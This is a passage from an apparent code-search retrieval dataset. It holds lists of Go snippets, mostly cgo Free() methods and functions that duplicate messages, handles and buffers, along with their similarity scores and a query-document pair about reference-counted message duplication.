nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzErrorContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (joint Joint) Free() {\n\n\tif joint.joint != nil {\n\t\tC.skeltrack_joint_free(joint.joint)\n\t}\n}", "func (x *PDFMrange) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFLexbuf) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzText) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (rebase *Rebase) Free() {\n\truntime.SetFinalizer(rebase, nil)\n\tC.git_rebase_free(rebase.ptr)\n}", "func Free(mem []byte) error {\n\treturn nil\n}", "func (room *Room) Free() {\n\n\tif room.done() {\n\t\treturn\n\t}\n\troom.setDone()\n\n\troom.wGroup.Wait()\n\n\troom.Status = StatusFinished\n\tgo room.historyFree()\n\tgo room.messagesFree()\n\tgo room.Players.Free()\n\tgo room.Observers.Free()\n\tgo room.Field.Free()\n\n\tclose(room.chanFinish)\n\tclose(room.chanStatus)\n}", "func (x *FzWarnContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (s *f64) Free(p *PoolAllocator) {\n\tmustSameCapacity(s.Cap(), p.Channels*p.Capacity)\n\tfor i := range s.buffer {\n\t\ts.buffer[i] = 0\n\t}\n\tp.f64.Put(s)\n}", "func (stack *StackAllocator) Free(size int32) {\n\tstack.alloc -= size\n\tif stack.alloc < 0 {\n\t\tstack.alloc = 0\n\t}\n\treturn\n}", "func (x *FzDocumentHandler) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (rater *RateLimiter) Free() {\n\trater.semaphore <- true\n}", "func (b *Buffer) Free() int {\n\treturn b.size - b.used\n}", "func (x *FzStextBlock) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzDocument) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzDocumentHandlerContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzAes) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzLocksContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzDocumentWriter) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzArc4) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzAaContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func freeBuffer(buf *bytes.Buffer) {\n\tbuf.Reset()\n\tbufferPool.Put(buf)\n}", "func (x *FzMatrix) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (i *Inode) Free(t *jrnl.TxnHandle) error {\n\tif i.Refcnt == 0 {\n\t\tlog.Fatal(\"double free\")\n\t}\n\n\ti.Refcnt--\n\tif err := i.EnqWrite(t); err != nil {\n\t\treturn err\n\t}\n\ti.Relse()\n\tfmt.Printf(\"Freed inode w/ serial num %d, refcnt %d\\n\", i.Serialnum, i.Refcnt)\n\treturn nil\n}", "func (x *FzGlyph) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFVmtx) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (b *BufferManager) FreeBuffer(peer *PeerSession) {\n\tpeer.buffers = nil\n\tb.freeIndex.Enqueue(peer.bufferOffst)\n}", "func (x *PDFOcgDescriptor) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzMd5) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzTextItem) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *ImVec2) Free() {\n\tif x != nil && x.allocs74e98a33 != nil {\n\t\tx.allocs74e98a33.(*cgoAllocMap).Free()\n\t\tx.ref74e98a33 = nil\n\t}\n}", "func (x *FzGlyphCache) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFGstate) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (m *mmapData) free() error {\n\treturn syscallMunmap(m.data)\n}", "func (x *PDFSubmitEvent) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFCmap) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (z *Writer) freeBuffers() {\n\t// Put the buffer back into the pool, if any.\n\tputBuffer(z.Header.BlockMaxSize, z.data)\n\tz.data = nil\n}", "func (x *FzTransition) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (recv *ValueArray) Free() {\n\tC.g_value_array_free((*C.GValueArray)(recv.native))\n\n\treturn\n}", "func (x *PDFDesignatedName) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzIdContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (g *Geometry) Free() {\n\tgl.DeleteVertexArrays(1, &g.handle)\n\tg.IndexBuffer.free()\n\tg.PositionBuffer.free()\n\tg.NormalBuffer.free()\n\tg.TexCoordBuffer.free()\n}", "func (x *FzVertex) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzStextLine) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzBandWriter) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFPage) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzSha256) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzPathWalker) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFXref) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func free(ptr unsafe.Pointer)", "func (e *Enchant) Free() {\n\tC.enchant_broker_free(e.broker)\n}", "func (x *FzRect) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (r *RingBuffer) Free() int {\n\tr.mu.Lock()\n\tdefer r.mu.Unlock()\n\n\tif r.wPos == r.rPos {\n\t\tif r.isFull {\n\t\t\treturn 0\n\t\t}\n\t\treturn r.size\n\t}\n\n\tif r.wPos < r.rPos {\n\t\treturn r.rPos - r.wPos\n\t}\n\n\treturn r.size - r.wPos + r.rPos\n}", "func (x *PDFDocEvent) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFObj) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (blob *Blob) Free() {\n\tif blob != nil {\n\t\tblob.Owner.Reset()\n\t\tblob.Author.Reset()\n\t\tblob.Time = Time0\n\t\tblob.Name = \"\"\n\t\tblob.wo = 0\n\t\tselect {\n\t\tcase blobs.c <- blob:\n\t\tdefault:\n\t\t}\n\t}\n}", "func (pool AllocatingPool) FreeResource(raw RawResourceProps) error {\n\treturn pool.freeResourceInner(raw, pool.retireResource, pool.freeResourceImmediately, pool.benchResource)\n}", "func (x *FzColorConverter) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFCrypt) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *Value) Free() {\n\tif x != nil && x.allocs23e8c9e3 != nil {\n\t\tx.allocs23e8c9e3.(*cgoAllocMap).Free()\n\t\tx.ref23e8c9e3 = nil\n\t}\n}", "func (x *FzAllocContext) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzDevice) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}" ]
[ "0.7511681", "0.7141758", "0.64743555", "0.6416629", "0.61727434", "0.6037461", "0.59808373", "0.5910276", "0.5909302", "0.5899108", "0.5874916", "0.5853634", "0.5834384", "0.583358", "0.58314615", "0.580654", "0.5789198", "0.57745117", "0.5758875", "0.5738124", "0.5727779", "0.5724322", "0.5720086", "0.5705971", "0.5701508", "0.56986034", "0.56979686", "0.56916225", "0.5691567", "0.56868273", "0.5663881", "0.566248", "0.5658871", "0.5658466", "0.56581223", "0.56490815", "0.56418854", "0.5636953", "0.56219465", "0.56203884", "0.5616005", "0.56071174", "0.5601506", "0.5601106", "0.5595261", "0.55951774", "0.5591904", "0.55909437", "0.55792993", "0.5570368", "0.55669117", "0.5565409", "0.5560516", "0.5559614", "0.5550245", "0.5536764", "0.55320436", "0.5529467", "0.55238974", "0.5521141", "0.55196893", "0.55186456", "0.55166316", "0.550857", "0.55076057", "0.55030906", "0.5502314", "0.55000937", "0.54968596", "0.54890937", "0.54886454", "0.5479905", "0.54755896", "0.54738975", "0.5464763", "0.54629326", "0.5461079", "0.54536164", "0.5452171", "0.54345846", "0.54314995", "0.54307014", "0.5430161", "0.5424741", "0.5418121", "0.5413946", "0.541355", "0.54129255", "0.5412274", "0.54109585", "0.54098415", "0.54093385", "0.5407356", "0.5406367", "0.5406305", "0.5405926", "0.5405423", "0.5404049", "0.53909856", "0.538355" ]
0.785433
0
Dup creates a "duplicate" message. What it really does is simply increment the reference count on the message. Note that since the underlying message is actually shared, consumers must take care not to modify the message. (We might revise this API in the future to add a copyonwrite facility, but for now modification is neither needed nor supported.) Applications should NOT make use of this function it is intended for Protocol, Transport and internal use only.
func (m *Message) Dup() *Message { atomic.AddInt32(&m.refcnt, 1) return m }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (pkt *Packet) Dup() {\n\tpkt.mtx.Lock()\n\tif *pkt.refCount <= 0 {\n\t\tpanic(\"cannot reference freed packet\")\n\t}\n\t*pkt.refCount++\n\tpkt.mtx.Unlock()\n}", "func (c *Clac) DupN() error {\n\tnum, err := c.popCount()\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn c.dup(0, num)\n}", "func Duplicate(h handle.Handle, pid uint32, access handle.DuplicateAccess) (handle.Handle, error) {\n\ttargetPs, err := process.Open(process.DupHandle, false, pid)\n\tif err != nil {\n\t\treturn ^handle.Handle(0), err\n\t}\n\tdefer targetPs.Close()\n\tcurrentPs, err := process.Open(process.DupHandle, false, uint32(os.Getpid()))\n\tif err != nil {\n\t\treturn ^handle.Handle(0), err\n\t}\n\tdefer currentPs.Close()\n\t// duplicate the remote handle in the current process's address space.\n\t// Note that for certain handle types this operation might fail\n\t// as they don't permit duplicate operations\n\tdup, err := h.Duplicate(targetPs, currentPs, access)\n\tif err != nil {\n\t\treturn ^handle.Handle(0), fmt.Errorf(\"couldn't duplicate handle: %v\", err)\n\t}\n\treturn dup, nil\n}", "func (c *Clac) Dup() error {\n\treturn c.dup(0, 1)\n}", "func (handle Handle) Duplicate(src, dest Handle, access DuplicateAccess) (Handle, error) {\n\tvar destHandle Handle\n\terrno, _, err := duplicateHandle.Call(\n\t\tuintptr(src),\n\t\tuintptr(handle),\n\t\tuintptr(dest),\n\t\tuintptr(unsafe.Pointer(&destHandle)),\n\t\tuintptr(access),\n\t\t0,\n\t\t0,\n\t)\n\tif winerrno.Errno(errno) != winerrno.Success {\n\t\treturn destHandle, nil\n\t}\n\treturn Handle(0), os.NewSyscallError(\"DuplicateHandle\", err)\n}", "func (jbobject *JavaNioCharBuffer) Duplicate() *JavaNioCharBuffer {\n\tjret, err := jbobject.CallMethod(javabind.GetEnv(), \"duplicate\", \"java/nio/CharBuffer\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tretconv := javabind.NewJavaToGoCallable()\n\tdst := &javabind.Callable{}\n\tretconv.Dest(dst)\n\tif err := retconv.Convert(javabind.ObjectRef(jret)); err != nil {\n\t\tpanic(err)\n\t}\n\tretconv.CleanUp()\n\tunique_x := &JavaNioCharBuffer{}\n\tunique_x.Callable = dst\n\treturn unique_x\n}", "func Duplicate(channel <-chan *hungryfox.Diff, buffLen int) (<-chan *hungryfox.Diff, <-chan *hungryfox.Diff) {\n\tch1, ch2 := make(chan *hungryfox.Diff, buffLen), make(chan *hungryfox.Diff, buffLen)\n\tgo func() {\n\t\tfor val := range channel {\n\t\t\tch1 <- val\n\t\t\tch2 <- val\n\t\t}\n\t\tclose(ch1)\n\t\tclose(ch2)\n\t}()\n\treturn ch1, ch2\n}", "func (c *Clac) DupR() error {\n\tnum, err := c.popCount()\n\tif err != nil {\n\t\treturn err\n\t}\n\tpos, err := c.popIndex()\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn c.dup(pos, num)\n}", "func Clone(m Message) (Message, error) {\n\tb := m.CachedBinary()\n\n\tif m.Payload() == nil {\n\t\treturn nil, fmt.Errorf(\"could not clone message, topic: %s\", m.Category())\n\t}\n\n\treturn simple{\n\t\tcategory: m.Category(),\n\t\tmarshaled: &b,\n\t\tpayload: m.Payload().Copy(),\n\t\tmetadata: m.Metadata(),\n\t}, nil\n}", "func DupFd() (int, error) {\n\treturn server.DupFd()\n}", "func (msg *Message) Clone(message *Message) *Message {\n\tmsgID := uuid.New().String()\n\treturn NewRawMessage().BuildHeader(msgID, message.GetParentID(), message.GetTimestamp()).\n\t\tBuildRouter(message.GetSource(), message.GetGroup(), message.GetResource(), message.GetOperation()).\n\t\tFillBody(message.GetContent())\n}", "func (recv *Value) DupObject() Object {\n\tretC := C.g_value_dup_object((*C.GValue)(recv.native))\n\tretGo := *ObjectNewFromC(unsafe.Pointer(retC))\n\n\treturn retGo\n}", "func NewDuplicatedRecord(code Code) *DuplicatedRecord {\n\terr := &DuplicatedRecord{}\n\terr.Code = code\n\terr.defaultMessage = \"duplicated record\"\n\treturn err\n}", "func (d *Duplicator) Duplicate(in chan Any, count int) (outs []chan Any) {\n\t// Create duplicate channels\n\touts = make([]chan Any, 0, count)\n\tfor i := 0; i < count; i++ {\n\t\touts = append(outs, make(chan Any))\n\t}\n\n\t// Pipe input to all of the outputs\n\tgo func(outs []chan Any) {\n\t\tfor x := range in {\n\t\t\tfor _, o := range outs {\n\t\t\t\to <- x\n\t\t\t}\n\t\t}\n\t\tfor _, o := range outs {\n\t\t\tclose(o)\n\t\t}\n\t}(outs)\n\n\treturn outs\n}", "func (m *Message) DeepCopy() *Message {\n\tif m == nil {\n\t\treturn nil\n\t}\n\t// We can't use vm.CoreInstance because we won't have access to a VM\n\t// everywhere we need it, e.g. Block.Clone(). Instead, steal the protos\n\t// from the message we're copying.\n\tfm := &Message{\n\t\tObject: Object{Slots: Slots{}, Protos: append([]Interface{}, m.Protos...)},\n\t\tText: m.Text,\n\t\tArgs: make([]*Message, len(m.Args)),\n\t\tPrev: m.Prev,\n\t\tMemo: m.Memo,\n\t}\n\tfor i, arg := range m.Args {\n\t\tfm.Args[i] = arg.DeepCopy()\n\t}\n\tfor pm, nm := fm, m.Next; nm != nil; pm, nm = pm.Next, nm.Next {\n\t\tpm.Next = &Message{\n\t\t\tObject: Object{Slots: Slots{}, Protos: append([]Interface{}, nm.Protos...)},\n\t\t\tText: nm.Text,\n\t\t\tArgs: make([]*Message, len(nm.Args)),\n\t\t\tPrev: pm,\n\t\t\tMemo: nm.Memo,\n\t\t}\n\t\tfor i, arg := range nm.Args {\n\t\t\tpm.Next.Args[i] = arg.DeepCopy()\n\t\t}\n\t}\n\treturn fm\n}", "func (d *Release) Replicate() int {\n\tsize := 0\n\tfor _, dest := range d.to {\n\t\tswitch dest.(type) {\n\t\tcase *devNull:\n\t\tdefault:\n\t\t\tsize++\n\t\t}\n\t}\n\treturn size\n}", "func (m *Message) Copy() *Message {\n\t// Create a new message\n\tnewMessage := &Message{}\n\n\t// Copy stuff from the old message\n\t*newMessage = *m\n\n\t// Copy any IRcv3 tags\n\tnewMessage.Tags = m.Tags.Copy()\n\n\t// Copy the Prefix\n\tnewMessage.Prefix = m.Prefix.Copy()\n\n\t// Copy the Params slice\n\tnewMessage.Params = append(make([]string, 0, len(m.Params)), m.Params...)\n\n\t// Similar to parsing, if Params is empty, set it to nil\n\tif len(newMessage.Params) == 0 {\n\t\tnewMessage.Params = nil\n\t}\n\n\treturn newMessage\n}", "func (request *ActivityRecordHeartbeatRequest) Clone() IProxyMessage {\n\tactivityRecordHeartbeatRequest := NewActivityRecordHeartbeatRequest()\n\tvar messageClone IProxyMessage = activityRecordHeartbeatRequest\n\trequest.CopyTo(messageClone)\n\n\treturn messageClone\n}", "func (s *sizeTracker) dup() *sizeTracker {\n\tif len(s.keyToSize) == 0 {\n\t\treturn &sizeTracker{}\n\t}\n\tk2s := make(map[string]int64, len(s.keyToSize))\n\tfor k, v := range s.keyToSize {\n\t\tk2s[k] = v\n\t}\n\treturn &sizeTracker{k2s, s.total}\n}", "func (s *stack) DupN(n int) error {\n\tfor n > 0 {\n\t\ts.stk = append(s.stk, s.stk[len(s.stk)-1])\n\t\tn--\n\t}\n\treturn nil\n}", "func (r *Message) Copy() *Message {\r\n\tcopy := &Message{}\r\n\tcopy_header := *r.Header\r\n\tcopy.Header = &copy_header\r\n\tcopy.Payload = r.Payload\r\n\tcopy.ReceivedPayloadLength = r.ReceivedPayloadLength\r\n\tcopy.PerferCid = r.PerferCid\r\n\tcopy.SentPayloadLength = r.SentPayloadLength\r\n\treturn copy\r\n}", "func Dup(d DataType) DataType {\n\treturn newDupper().DupType(d)\n}", "func (f File) CopyFileDup(src string) (string, error) {\n\tnf := File(f) // First create a new File type\n\tnf.Title = genDupTitle(nf.Title) // Rename that Title &#!T\n\n\tfp := path.Join(FileLoc, nf.Title) // New Path that includes \".copy\"\n\n\tnp, err := WriteFile(fp, src) // Writes file\n\tif err == nil {\n\t\treturn np, nil // If no error then return expected returns\n\t}\n\n\t// If error refers that, this filename exists too, try again & again & again\n\tif err.Error() == \"dup:err\" {\n\t\treturn nf.CopyFileDup(src) // Recursively run the function\n\t}\n\n\t// If some other error\n\treturn \"\", err\n}", "func (blk *Block) duplicate() *Block {\n\tdup := &Block{}\n\n\t// Copy over.\n\t*dup = *blk\n\n\tdupContents := contentstream.ContentStreamOperations{}\n\tfor _, op := range *blk.contents {\n\t\tdupContents = append(dupContents, op)\n\t}\n\tdup.contents = &dupContents\n\n\treturn dup\n}", "func (this *BinlogEntry) Duplicate() *BinlogEntry {\n\tbinlogEntry := NewBinlogEntry(this.Coordinates.LogFile, uint64(this.Coordinates.LogPos))\n\tbinlogEntry.EndLogPos = this.EndLogPos\n\treturn binlogEntry\n}", "func (c *Client) PutDuplicate(oldName, newName upspin.PathName) (*upspin.DirEntry, error) {\n\tconst op errors.Op = \"client.PutDuplicate\"\n\tm, s := newMetric(op)\n\tdefer m.Done()\n\n\treturn c.dupOrRename(op, oldName, newName, false, s)\n}", "func (w *messageWriter) Write(rm *producer.RefCountedMessage) {\n\tvar (\n\t\tnowNanos = w.nowFn().UnixNano()\n\t\tmsg = w.newMessage()\n\t\tmetrics = w.Metrics()\n\t)\n\tw.Lock()\n\tif !w.isValidWriteWithLock(nowNanos, metrics) {\n\t\tw.Unlock()\n\t\tw.close(msg)\n\t\treturn\n\t}\n\trm.IncRef()\n\tw.msgID++\n\tmeta := metadata{\n\t\tmetadataKey: metadataKey{\n\t\t\tshard: w.replicatedShardID,\n\t\t\tid: w.msgID,\n\t\t},\n\t}\n\tmsg.Set(meta, rm, nowNanos)\n\tw.acks.add(meta, msg)\n\t// Make sure all the new writes are ordered in queue.\n\tmetrics.enqueuedMessages.Inc(1)\n\tif w.lastNewWrite != nil {\n\t\tw.lastNewWrite = w.queue.InsertAfter(msg, w.lastNewWrite)\n\t} else {\n\t\tw.lastNewWrite = w.queue.PushFront(msg)\n\t}\n\tw.Unlock()\n}", "func TestVnic_Dup(t *testing.T) {\n\tvnic, _ := newVnic(\"testvnic\")\n\n\tif err := vnic.create(); err != nil {\n\t\tt.Errorf(\"Vnic creation failed: %v\", err)\n\t}\n\n\tdefer vnic.destroy()\n\n\tvnic1, _ := newVnic(\"testvnic\")\n\n\tif err := vnic1.create(); err == nil {\n\t\tt.Errorf(\"Duplicate Vnic creation: %v\", err)\n\t}\n\n}", "func (s *Server) DupFd() (int, error) {\n\treturn s.listener.DupFd()\n}", "func (rb *RingBuffer) Clone() *RingBuffer {\n\trb.lock.RLock()\n\tdefer rb.lock.RUnlock()\n\tcp := make([]stats.Record, len(rb.data))\n\tcopy(cp, rb.data)\n\treturn &RingBuffer{seq: rb.seq, data: cp}\n}", "func (recv *Value) DupString() string {\n\tretC := C.g_value_dup_string((*C.GValue)(recv.native))\n\tretGo := C.GoString(retC)\n\tdefer C.free(unsafe.Pointer(retC))\n\n\treturn retGo\n}", "func localDup(oldfd int, newfd int) error {\n\treturn syscall.Dup3(oldfd, newfd, 0)\n}", "func CloneOnDup(n OnDup) OnDup {\n\tres := make(OnDup, 0, len(n))\n\tfor _, x := range n {\n\t\tres = append(res, CloneRefOfUpdateExpr(x))\n\t}\n\treturn res\n}", "func (err *DuplicatedRecord) DuplicatedRecord() {}", "func (mc MultiCursor) Dup() MultiCursor {\n\tnewCursors := make([]Cursor, mc.Length())\n\tfor k, cursor := range mc.cursors {\n\t\tnewCursors[k] = cursor.Dup()\n\t}\n\treturn MultiCursor{\n\t\tcursors: newCursors,\n\t\tmutex: &sync.Mutex{},\n\t}\n}", "func (this *PipelinePack) Recycle() {\n\tcount := atomic.AddInt32(&this.RefCount, -1)\n\tif count == 0 {\n\t\tthis.Reset()\n\n\t\t// reuse this pack to avoid re-alloc\n\t\tthis.RecycleChan <- this\n\t} else if count < 0 {\n\t\tGlobals().Panic(\"reference count below zero\")\n\t}\n}", "func (p *Plugin) AddRefCount(count int) {\n\tp.mu.Lock()\n\tdefer p.mu.Unlock()\n\n\tp.refCount += count\n}", "func (eventMessage EventMessage) Clone(source string) EventMessage {\n\tnewMessage := EventMessage{\n\t\tHeader: eventMessage.Header,\n\t}\n\tnewMessage.Header.Source = source\n\tnewMessage.Header.Timestamp = time.Now().UnixNano() / int64(time.Millisecond)\n\treturn newMessage\n}", "func (m *Message) Clone() Interface {\n\treturn &Message{\n\t\tObject: Object{Slots: Slots{}, Protos: []Interface{m}},\n\t\tText: m.Text,\n\t}\n}", "func NewDuplicator(bs, offset, count int64, input, output string) (*Duplicator, error) {\n\treturn &Duplicator{\n\t\tinFile: input,\n\t\toutFile: output,\n\t\tbs: bs,\n\t\tcount: count,\n\t\toffset: offset,\n\t}, nil\n}", "func (r *Replicator) Replicate(ctx context.Context) error {\n\terr := r.replicate(ctx)\n\tif err != nil {\n\t\tlog.Warn(\"Replicate error: %s\", err.Error())\n\t\tmessage := fmt.Sprintf(\"Error: %s\", err.Error())\n\t\tr.stats.History.Add(&StatsHistoryRecord{\n\t\t\tTime: time.Now(),\n\t\t\tMessage: message,\n\t\t})\n\t\tif err := r.setState(BlpError, message); err != nil {\n\t\t\tlog.Warn(\"Failed to set error state: %v\", err)\n\t\t}\n\t}\n\tclose(r.done)\n\treturn err\n}", "func (r *ImageRef) Replicate(across int, down int) error {\n\tout, err := vipsReplicate(r.image, across, down)\n\tif err != nil {\n\t\treturn err\n\t}\n\tr.setImage(out)\n\treturn nil\n}", "func IsDup(err error) bool {\n\treturn mgo.IsDup(err)\n}", "func TestTransformer_duplicator(t *testing.T) {\n\tsrcTopic := getTopic(t, \"source-topic\")\n\tdstTopic := srcTopic + \"-passthrough\"\n\n\tconfig := kafka.Config{\n\t\tSourceTopic: srcTopic,\n\t\tConsumerConfig: getConsumerConfig(t, \"integration-test-group\"),\n\t\tProducerConfig: getProducerConfig(),\n\t\tTransformer: NewDuplicatorTransformer(),\n\t}\n\n\ttransformer, err := kafka.NewKafkaTransformer(config)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n\tdefer transformer.Stop()\n\n\tgo func() {\n\t\terr = transformer.Run()\n\t}()\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n\n\tmessages := messages(srcTopic, 5)\n\n\t// 10 because each messages are duplicated\n\texpectedMessages := make([]*confluent.Message, 0, 10)\n\n\tfor _, msg := range messages {\n\t\texpectedMessages = append(expectedMessages, msg, msg)\n\t}\n\n\tproduceMessages(t, messages)\n\tassertMessagesinTopic(t, dstTopic, expectedMessages)\n}", "func (s *DealService) Duplicate(ctx context.Context, id int) (*DealResponse, *Response, error) {\n\turi := fmt.Sprintf(\"/deals/%v/duplicate\", id)\n\treq, err := s.client.NewRequest(http.MethodPost, uri, nil, nil)\n\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar record *DealResponse\n\n\tresp, err := s.client.Do(ctx, req, &record)\n\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn record, resp, nil\n}", "func (eval *evaluator) Replicate(ctIn *Ciphertext, batchSize, n int, ctOut *Ciphertext) {\n\teval.InnerSum(ctIn, -batchSize, n, ctOut)\n}", "func (e Elem) Dup() Elem {\n\treturn e.Field.Elem(e.e)\n}", "func (f *PushFilter) Duplicate() *PushFilter {\n\n\tnf := NewPushFilter()\n\n\tfor id, types := range f.Identities {\n\t\tnf.FilterIdentity(id, types...)\n\t}\n\n\tfor k, v := range f.Params {\n\t\tnf.SetParameter(k, v...)\n\t}\n\n\treturn nf\n}", "func IsDup(err error) bool {\n\twriteException, ok := err.(mongo.WriteException)\n\n\tif !ok {\n\t\treturn false\n\t}\n\n\tfor _, writeError := range writeException.WriteErrors {\n\t\treturn writeError.Code == 11000 || writeError.Code == 11001 || writeError.Code == 12582 || writeError.Code == 16460 && strings.Contains(writeError.Message, \" E11000 \")\n\t}\n\n\treturn false\n}", "func (pk PacketBuffer) Clone() PacketBuffer {\n\tpk.Data = pk.Data.Clone(nil)\n\treturn pk\n}", "func TestVnicContainer_Dup(t *testing.T) {\n\tvnic, _ := newVnic(\"testconvnic\")\n\n\tif err := vnic.create(); err != nil {\n\t\tt.Errorf(\"Vnic creation failed: %v\", err)\n\t}\n\n\tdefer vnic.destroy()\n\n\tvnic1, _ := newVnic(\"testconvnic\")\n\n\tif err := vnic1.create(); err == nil {\n\t\tt.Errorf(\"Duplicate Vnic creation: %v\", err)\n\t}\n\n}", "func (v Undelegate) Copy() StakeMsg {\n\tv1 := v\n\treturn v1\n}", "func (pk PacketBufferPtr) DeepCopyForForwarding(reservedHeaderBytes int) PacketBufferPtr {\n\tpayload := BufferSince(pk.NetworkHeader())\n\tdefer payload.Release()\n\tnewPk := NewPacketBuffer(PacketBufferOptions{\n\t\tReserveHeaderBytes: reservedHeaderBytes,\n\t\tPayload: payload.DeepClone(),\n\t\tIsForwardedPacket: true,\n\t})\n\n\t{\n\t\tconsumeBytes := len(pk.NetworkHeader().Slice())\n\t\tif _, consumed := newPk.NetworkHeader().Consume(consumeBytes); !consumed {\n\t\t\tpanic(fmt.Sprintf(\"expected to consume network header %d bytes from new packet\", consumeBytes))\n\t\t}\n\t\tnewPk.NetworkProtocolNumber = pk.NetworkProtocolNumber\n\t}\n\n\t{\n\t\tconsumeBytes := len(pk.TransportHeader().Slice())\n\t\tif _, consumed := newPk.TransportHeader().Consume(consumeBytes); !consumed {\n\t\t\tpanic(fmt.Sprintf(\"expected to consume transport header %d bytes from new packet\", consumeBytes))\n\t\t}\n\t\tnewPk.TransportProtocolNumber = pk.TransportProtocolNumber\n\t}\n\n\tnewPk.tuple = pk.tuple\n\n\treturn newPk\n}", "func dup1() {\n\tcountLines(os.Stdin, counts)\n}", "func NtDuplicateToken(\n\tExistingTokenHandle Handle,\n\tDesiredAccess AccessMask,\n\tObjectAttributes *ObjectAttributes,\n\tEffectiveOnly bool,\n\tTokenType TokenTypeT,\n\tNewTokenHandle *Handle,\n) NtStatus {\n\tr0, _, _ := procNtDuplicateToken.Call(uintptr(ExistingTokenHandle),\n\t\tuintptr(DesiredAccess),\n\t\tuintptr(unsafe.Pointer(ObjectAttributes)),\n\t\tfromBool(EffectiveOnly),\n\t\tuintptr(TokenType),\n\t\tuintptr(unsafe.Pointer(NewTokenHandle)))\n\treturn NtStatus(r0)\n}", "func StatsdDuplicate(watchType string, watchID string) {\n\tif DogStatsd {\n\t\tstatsd, _ := godspeed.NewDefault()\n\t\tdefer statsd.Conn.Close()\n\t\ttags := makeTags(watchType, watchID, \"\", \"\")\n\t\tmetricName := fmt.Sprintf(\"%s.duplicate\", MetricPrefix)\n\t\tstatsd.Incr(metricName, tags)\n\t}\n\tLog(fmt.Sprintf(\"dogstatsd='%t' %s='%s' action='duplicate'\", DogStatsd, watchType, watchID), \"debug\")\n}", "func TestAddDuplicate(t *testing.T) {\n\tRegisterTestingT(t)\n\t// Needs to be indexed to catch duplicates hence different collection\n\tcollection := \"dups\"\n\tdbh.EnsurePathIndex(DB, collection)\n\t// Object to insert\n\tobj := MyType{\"abc\"}\n\t// Insert first object\n\terr := dbh.Add(DB, collection, \"duplicate/object\", obj)\n\tExpect(err).Should(BeNil())\n\t// Insert second (duplicate) object\n\terr = 